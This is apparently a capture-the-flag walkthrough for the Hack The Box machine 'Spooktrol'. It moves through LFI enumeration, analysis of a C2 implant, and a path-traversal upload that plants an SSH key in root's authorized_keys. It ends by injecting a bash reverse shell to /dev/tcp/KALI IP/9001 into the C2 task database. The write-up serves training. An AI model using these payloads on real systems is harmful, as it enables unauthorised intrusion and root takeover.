Name Spooktrol
OS Linux
RELEASE DATE 26 Oct 2021

Nmap Scan


nmap -p- -sC -sV -oN nmap/scriptScan  

PORT     STATE SERVICE VERSION                                                                 
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)            
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)           
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)         
80/tcp   open  http    uvicorn                                                                 
| fingerprint-strings:                                                                         
|   FourOhFourRequest:                                                                         
|     HTTP/1.1 404 Not Found                                                                   
|     date: Mon, 08 Nov 2021 18:55:44 GMT                                                      
|     server: uvicorn
|     content-length: 22                                                                       
|     content-type: application/json
|     Connection: close                                                                        
|     {"detail":"Not Found"}                                                                   
|   GetRequest: 
|     HTTP/1.1 200 OK            
|     date: Mon, 08 Nov 2021 18:55:32 GMT
|     server: uvicorn
|     content-length: 43
|     content-type: application/json
|     Connection: close
|     {"auth":"111fb8232117db42814921d3a03b0e7e"}
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Mon, 08 Nov 2021 18:55:38 GMT
|     server: uvicorn
|     content-length: 31
|     content-type: application/json
|     Connection: close
|_    {"detail":"Method Not Allowed"}
| http-robots.txt: 1 disallowed entry 
|_http-server-header: uvicorn
|_http-title: Site doesn't have a title (application/json).
2222/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 16:77:76:8a:65:a3:db:23:11:21:66:6e:e4:c3:f2:32 (RSA)
|   256 61:92:eb:7a:a9:14:d7:60:51:00:0c:44:21:a2:61:08 (ECDSA)
|_  256 75:c1:96:9c:69:aa:c8:74:ef:4f:72:bd:62:53:e9:4c (ED25519)

SSH 22, 2222

It looks like there are two ssh ports listening with unique keys. There is most likely a docker container running.

The attack surface here is minimal so I’ll move onto port 80


Going to the page we can see some JSON and a unique auth token


From our nmap scan we see that there is 1 disallowed entry /file_management/?file=implant. Going there we see a bunch of junk on the screen


Lets try seeing if it is vulnerable to LFI


Looking in the /etc/passwd file there are not really any users home directories that we can enumerate. I’ll move back to the weird file implant and pick it apart a little.


I’ll use wget to download the file

└─# wget ''                                 

Running file against it we can see that it is an executable

└─# file implant| more                                                                                                       
implant: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=ce05777839d03f0df9cfcc82f20c437dd55e645e, with debug_info, not stripped

After running it we see it errors out

└─# ./implant                                                                                                                                                                                 
terminate called after throwing an instance of 'nlohmann::detail::parse_error'                                                                                                                
  what():  [json.exception.parse_error.101] parse error at line 1, column 1: syntax error while parsing value - unexpected end of input; expected '[', '{', or a literal                      
zsh: abort      ./implant 

I used strace to look at how implant is behaving when it runs strace ./implant

I found that it is trying to make some connections. The first one is a UDP connection and the second is a TCP. If I had to guess the UDP is some sort of DNS request

socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP) = 3                                                                                                                                                  
close(3)                                = 0                                                                                                                                                   
socketpair(AF_UNIX, SOCK_STREAM, 0, [3, 4]) = 0   

Next, I opened up wireshark and captured the packets. I saw that it was sending the request on eth0 rather than tun0. We can see that it is making a DNS request to spooktrol.htb


Lets add it to our /etc/hosts file spooktrol.htb

After running it again it kept aborting out so I decided to run it in a docker container

 docker run --rm -it --entrypoint=/bin/bash -v `pwd`:/$/root/htb/spooktrol -w /root/htb/spooktrol "$@" ubuntu:18.04
 apt-get update
 apt-get install vim
 vim /etc/hosts

It started to work after that

 root@a7c426f68fef:/$/root/htb/spooktrol# ./implant
No tasks...

Lets now see what is going on in wireshark red is implant blue is server


Analyzing it we can see that we are sending a request of our hostname to the server (my docker container /?hostname=a7c426f68fef), then the server is printing out some args and we are posting them to the server. So this is probably some kind of C2

# LFI Fuzzing

I decided to next move on and try and fuzz out the file structure using ffuf I know that its a python web server (uvicorn from wireshark) so I can fuzz for .py files I started with one directory above and found and inside revealed app.main ffuf -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -t 200

 import uvicorn                               
if __name__ == "__main__":"app.main:app", host="", port=8000, reload=True)

This lead me to fuzz ../app/ and gave me lots of files

 ffuf -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -t 200
main                    [Status: 200, Size: 2938, Words: 546, Lines: 89]
database                [Status: 200, Size: 406, Words: 46, Lines: 13]
models                  [Status: 200, Size: 1014, Words: 161, Lines: 41]

I went ahead and downloaded we can see that there is /file_upload/ lets try and upload a file. I created a file called “test.txt” that I used to test this with. We used PUT as our method and a randomly generated cookie from the main page.

└─# curl -X PUT -F file=@test.txt -H 'Cookie: auth=1d9359ba30b2a9d8d39f2998d7ae5858'
{"message":"File upload successful /file_management/?file=test.txt"}  

We can now upload files! Lets upload our ssh cat ~/.ssh/ > authorized_keys

Create the request and send it to burp

└─# curl -X PUT -F file=@authorized_keys -H 'Cookie: auth=1d9359ba30b2a9d8d39f2998d7ae5858' --proxy 

Change the filename= to ../../../../../root/.ssh/authorized_keys. This will put our ssh key into the roots folder of authorized_keys

PUT /file_upload/ HTTP/1.1
User-Agent: curl/7.74.0
Accept: */*
Cookie: auth=1d9359ba30b2a9d8d39f2998d7ae5858
Content-Length: 770
Content-Type: multipart/form-data; boundary=------------------------a26f86f211353f47
Connection: close

Content-Disposition: form-data; name="file"; filename="../../../../../root/.ssh/authorized_keys"
Content-Type: application/octet-stream

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCgLkSJjtpRAEOKT6SKcdsv37MX/ib4dWJ79lelyHcpvwjqXIe7XXIjzs1zQs0DDiDINA/Bg339LdWHON2MmsJcCSTRBVgf71Er+kwEE4/zdaW9HGK1HTZ22qupQzQ+rjDrihJ0jqnZ87sVUFQ4Z1+7ztl84rdwznJww+ZIy08G2xXFw2rwMPZD2fKdXwbYFUu5XqEvU4ClH+Iuo+bij9acJtl/qq3ora9goZcFDn2bbJ08Kj5OnvhVGR3y6Prc95qxTBQZz/SDakqmrCidvHBAnIizSwyDvXWLkivcF7LJ9fHJmD3MB2LPzvuxL9I/sYd9TneFtxEH9Lc4V32D43CnjGtCjSmqyc1Bhyh6SZ+EsjyHR65De8aX5sVjrMGkOI+LYi8wZ2Ik3ksT7CQxDnjhHGdncxbPbNwHx0VC/vyTkJ9HFnmCrhsPH+yX2t361iFks2RrQALPNNP6ZkWNX8xy1YD7J624WTK3LbRYYG0wr4Uh7igR+l2nDSFYMhN3jWc= root@kali

Now we can login as root on port 2222 the docker container

ssh -p 2222 root@  

root@spook2:~# id
uid=0(root) gid=0(root) groups=0(root)


Looking around the file structure I found /opt/spook2 with a database called sql_app.db I opened up the database with sqlite root@spook2:/opt/spook2# sqlite3 sql_app.db

Running .tables I can see a few tables, looking at sessions I can see that there is one for “spooktrol”, probably the host machine

sqlite> select * from sessions;

Another table was tasks, I can see that it is running commands on the machine with the respective session.

sqlite> select * from tasks;




I might be able to replace whoami with a reverse shell, so I’ll insert a new row

INSERT INTO tasks VALUES(12,'10a6dd5dde6094059db4d23d7710ae12',0,1,'bash -c "bash -i >& /dev/tcp/KALI IP/9001 0>&1"','',X'726f6f740a');

Then set up a listener and wait for the shell!

└─# nc -lvnp 9001                                              
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 58232
bash: cannot set terminal process group (15776): Inappropriate ioctl for device
bash: no job control in this shell
root@spooktrol:~# id
uid=0(root) gid=0(root) groups=0(root)